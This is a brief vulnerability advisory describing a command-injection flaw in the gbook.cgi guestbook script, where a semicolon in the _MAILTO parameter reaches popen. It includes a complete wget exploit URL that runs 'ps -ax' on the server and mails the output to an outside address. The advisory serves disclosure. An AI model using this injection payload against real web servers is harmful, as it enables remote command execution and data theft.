|
Vulnerability gbook.cgi Affected gbook.cgi Description JW Oh found following. gbook.cgi is used by some web sites. We can set _MAILTO parameter, and popen is called to execute mail command. If ';' is used in _MAILTO variable, you can execute arbitrary command with it. It's so trivial. This exploit executes "ps -ax" command and sends the result to haha@yaho.com. wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few" Solution It's fixed now...